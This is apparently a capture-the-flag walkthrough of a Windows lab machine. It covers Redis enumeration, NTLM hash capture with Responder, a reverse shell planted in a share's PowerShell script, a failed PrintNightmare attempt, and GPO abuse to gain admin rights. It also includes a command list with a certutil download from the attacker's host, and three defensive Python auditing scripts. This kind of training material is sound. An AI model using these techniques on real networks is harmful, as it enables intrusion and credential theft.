In this walkthrough, we covered enumerating a Redis NoSQL database, exploiting the Print Spooler service vulnerability CVE-2021-34527 (known as PrintNightmare), and abusing Group Policy in Active Directory.

VulnNet Entertainment had a bad time with their previous network which suffered multiple breaches. Now they moved their entire infrastructure and hired you again as a core penetration tester. Your objective is to get full access to the system and compromise the domain.

  • Difficulty: Medium
  • Operating System: Windows

Another Windows machine. Do your best and breach it, good luck!

Initial Scans and User Flag

I started with an Nmap scan, which showed a Redis database running. After installing the redis-cli tool, I connected to the database and used the info command to confirm it was running on Windows.

To get the user flag, I used the eval command in Redis to try and display a sensitive file. This actually caused an error that conveniently spat out the user flag for me.

Getting a Foothold

Next, I used the config get * command to find exposed directories and the username “enterprise security”. To get this user’s NTLM hash, I set up a Responder listener on my machine and used a Redis command to make the target machine connect back to me.
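The two Redis checks above (INFO to learn the host OS, CONFIG GET to learn the working directory) are the same data a defender can audit. The following is an added example, not code from the room or from the author: it parses an INFO reply in the text form redis-cli prints and a CONFIG GET reply in its flat name/value form, then reports the settings that make this foothold possible. Both sample replies are constructed, and the directory path and version string are placeholders.

```python
"""Audit Redis INFO and CONFIG GET output for unauthenticated exposure.
Added example (not from the room); the sample replies are constructed."""

from typing import Dict, List

# Constructed sample of what `redis-cli INFO` prints (version is a placeholder).
SAMPLE_INFO = """# Server
redis_version:0.0.0
os:Windows
arch_bits:64
tcp_port:6379

# Clients
connected_clients:1
"""

# Constructed sample of a `CONFIG GET *` reply: a flat [name, value, ...] list.
SAMPLE_CONFIG: List[str] = [
    "dir", "C:\\Users\\example-user\\Downloads",
    "dbfilename", "dump.rdb",
    "requirepass", "",
    "protected-mode", "no",
    "bind", "0.0.0.0",
]


def parse_info(raw: str) -> Dict[str, str]:
    """Flatten INFO text ('# Section' headers, 'key:value' lines) into a dict."""
    fields: Dict[str, str] = {}
    for line in raw.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(":")
        fields[key] = value
    return fields


def parse_config(flat: List[str]) -> Dict[str, str]:
    """CONFIG GET returns alternating names and values; pair them up."""
    if len(flat) % 2:
        raise ValueError("CONFIG GET reply must have an even number of items")
    return dict(zip(flat[0::2], flat[1::2]))


def audit(info: Dict[str, str], config: Dict[str, str]) -> List[str]:
    """Return the findings a defender should act on for this instance."""
    findings: List[str] = []
    if not config.get("requirepass"):
        findings.append("no requirepass set: anyone reaching the port can run INFO, CONFIG and EVAL")
    bound_everywhere = config.get("bind", "") in ("", "0.0.0.0", "*")
    if config.get("protected-mode", "yes").lower() == "no" and bound_everywhere:
        findings.append("protected-mode off while bound to all interfaces")
    if info.get("os", "").lower().startswith("windows"):
        findings.append("Redis host is Windows: block outbound SMB (445) from it to untrusted hosts (NTLM capture risk)")
    working_dir = config.get("dir", "")
    if "users" in working_dir.lower():
        findings.append(f"working directory is inside a user profile: {working_dir} (reveals a username, writable by Redis)")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_info(SAMPLE_INFO), parse_config(SAMPLE_CONFIG)):
        print("-", finding)
```

The parsers accept exactly what redis-cli shows on screen, so the output of a live INFO / CONFIG GET * session can be pasted in; a hardened instance (requirepass set, protected-mode yes, bound to loopback, dir outside any profile) produces only the OS finding.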

With the captured hash, I used Hashcat to crack it and get the password. I then used the SMB client to connect to the server and found a PowerShell script. I downloaded the script, added a reverse shell payload to it, and re-uploaded it. After setting up a Netcat listener, the executed script gave me a shell as the “enterprise security” user.
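The foothold here came from editing a PowerShell script that lived on a writable share and waiting for it to run. A baseline of script hashes catches that edit before the scheduled run. The following is an added example, not code from the room: it snapshots every script under a directory (or, for the offline demo, an in-memory set of files) by SHA-256 and reports what was modified, added or removed. The two script snapshots are constructed; the appended Invoke-Expression line stands in for the payload the walkthrough describes.

```python
"""File-integrity baseline for scripts on a share.
Added example (not from the room); the sample scripts are constructed."""

import hashlib
import os
from typing import Dict, Set

SCRIPT_EXTS = (".ps1", ".psm1", ".bat", ".cmd", ".vbs")


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def snapshot_bytes(files: Dict[str, bytes]) -> Dict[str, str]:
    """Baseline for an in-memory {relative path: content} mapping."""
    return {path: sha256_hex(content) for path, content in files.items()}


def snapshot_dir(root: str) -> Dict[str, str]:
    """Baseline for a real directory such as a mounted share; same output shape."""
    result: Dict[str, str] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(SCRIPT_EXTS):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    result[os.path.relpath(full, root)] = sha256_hex(fh.read())
    return result


def compare(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, Set[str]]:
    """Diff two snapshots; a changed hash on a known path is the interesting case."""
    return {
        "modified": {p for p in baseline if p in current and current[p] != baseline[p]},
        "added": set(current) - set(baseline),
        "removed": set(baseline) - set(current),
    }


# Constructed sample: a benign maintenance script and a backup batch file ...
BASELINE_FILES: Dict[str, bytes] = {
    "maintenance.ps1": b"Get-ChildItem C:\\Temp -Filter *.log | Remove-Item\r\n",
    "backup.bat": b"@echo off\r\nxcopy /s C:\\data D:\\backup\r\n",
}
# ... and the same share later, with one script edited and one new file dropped.
CURRENT_FILES: Dict[str, bytes] = {
    "maintenance.ps1": BASELINE_FILES["maintenance.ps1"]
    + b"Invoke-Expression (Get-Content C:\\Temp\\extra.ps1 -Raw)\r\n",
    "backup.bat": BASELINE_FILES["backup.bat"],
    "new-tool.ps1": b"Write-Host hello\r\n",
}


def demo() -> Dict[str, Set[str]]:
    """Run the comparison on the constructed snapshots."""
    return compare(snapshot_bytes(BASELINE_FILES), snapshot_bytes(CURRENT_FILES))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {sorted(paths)}")
```

In practice the baseline from snapshot_dir is stored somewhere the share's users cannot write, and the comparison runs before any scheduled execution of the scripts; a modified entry on a script that nobody checked in is the signal to investigate.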

Privilege Escalation Attempts

My first thought for privilege escalation was to try the PrintNightmare vulnerability, since the Nmap scan showed the Windows Print Spooler service was running. I used rpcmap.py to check for the vulnerability and even created a malicious DLL with msfvenom. However, when I tried to run the exploit, it failed.

So, I switched gears and decided to use BloodHound. I transferred the SharpHound.exe collector to the target machine, ran it to collect Active Directory data, and then analyzed the data back on my machine.

BloodHound showed me that the “enterprise security” user had “GenericWrite” access to a Group Policy Object (GPO). I used SharpGPOAbuse.exe to exploit this by adding a scheduled task to the GPO that would add the “enterprise security” user to the local “Administrators” group. I forced the policy update with gpupdate /force, and just like that, I had admin rights!
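The GPO change above lands on disk as a Group Policy Preferences ScheduledTasks.xml inside the GPO's SYSVOL folder, which is where a defender can look for it. The following is an added example, not code from the room or from SharpGPOAbuse: it parses such a file and flags any task whose command line adds a member to the local Administrators group, noting when the task is an immediate one (which fires on the next policy refresh, the gpupdate /force step in the walkthrough). The XML is a constructed sample whose element layout follows the GPP ScheduledTasks.xml format; the clsid and uid GUIDs are placeholders.

```python
"""Scan a GPP ScheduledTasks.xml for tasks that grant local admin rights.
Added example (not from the room); the XML below is constructed."""

import re
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample: one benign cleanup task and one immediate task that adds
# a domain user to the local Administrators group. GUIDs are placeholders.
SAMPLE_SCHEDULED_TASKS_XML = """<ScheduledTasks clsid="{PLACEHOLDER-CLSID}">
  <TaskV2 clsid="{PLACEHOLDER-CLSID}" name="NightlyCleanup" uid="{PLACEHOLDER-UID}">
    <Properties action="C" name="NightlyCleanup" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>cmd.exe</Command>
            <Arguments>/c del /q C:\\Temp\\*.log</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </TaskV2>
  <ImmediateTaskV2 clsid="{PLACEHOLDER-CLSID}" name="Update" uid="{PLACEHOLDER-UID}">
    <Properties action="C" name="Update" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>cmd.exe</Command>
            <Arguments>/c net localgroup administrators EXAMPLE\\some-user /add</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
"""

# Command lines that add a member to Administrators (net/net1 and the cmdlet).
ADMIN_GRANT = re.compile(
    r"(net1?\s+localgroup\s+administrators\b.*\s/add\b)|(Add-LocalGroupMember\b)",
    re.IGNORECASE,
)


def extract_tasks(xml_text: str) -> List[Dict[str, str]]:
    """Flatten each task element into its name, type, runAs account and command line."""
    root = ET.fromstring(xml_text)
    tasks: List[Dict[str, str]] = []
    for task_el in root:  # TaskV2, ImmediateTaskV2, ...
        props = task_el.find("Properties")
        run_as = props.get("runAs", "") if props is not None else ""
        cmdlines = []
        for exec_el in task_el.iter("Exec"):
            cmd = (exec_el.findtext("Command") or "").strip()
            args = (exec_el.findtext("Arguments") or "").strip()
            cmdlines.append(f"{cmd} {args}".strip())
        tasks.append({
            "name": task_el.get("name", ""),
            "type": task_el.tag,
            "run_as": run_as,
            "command": " ; ".join(cmdlines),
        })
    return tasks


def flag_admin_grants(xml_text: str) -> List[Dict[str, str]]:
    """Return only the tasks whose command line adds a member to Administrators."""
    flagged: List[Dict[str, str]] = []
    for task in extract_tasks(xml_text):
        if ADMIN_GRANT.search(task["command"]):
            task["reason"] = "adds a member to the local Administrators group"
            if task["type"] == "ImmediateTaskV2":
                task["reason"] += "; immediate task, runs at the next policy refresh"
            flagged.append(task)
    return flagged


if __name__ == "__main__":
    for task in flag_admin_grants(SAMPLE_SCHEDULED_TASKS_XML):
        print(f"{task['type']} '{task['name']}' as {task['run_as']}: {task['reason']}")
```

Pointing flag_admin_grants at every Machine\Preferences\ScheduledTasks\ScheduledTasks.xml under SYSVOL, and pairing the result with a review of which principals hold write rights on each GPO (the GenericWrite edge BloodHound surfaced here), turns this path into a routine check rather than a surprise.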

Getting the System Flag 🚩

With my new admin privileges, I used the SMB client to access the C$ share on the target machine. From there, it was just a matter of navigating to the administrator’s desktop and grabbing the system flag.

Technical Commands Used

Here are the technical commands I used in the terminal during the demonstration:

  • sudo apt-get install redis-tools (the package that provides redis-cli)
  • redis-cli -h [IP]
  • eval
  • config get *
  • sudo responder -I [interface]
  • hashcat
  • smbclient -L [IP] -U [user]
  • Invoke-Expression
  • python3 rpcmap.py
  • msfvenom
  • use multi/handler
  • sudo python3 -m http.server 80
  • certutil.exe -urlcache -f http://[IP]/[file] [file]
  • SharpHound.exe
  • copy [source] \\[IP]\[share]
  • SharpGPOAbuse.exe
  • gpupdate /force
  • get system.txt

What is the user flag? (Desktop\user.txt)

What is the system flag? (Desktop\system.txt)

Video Walk-through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
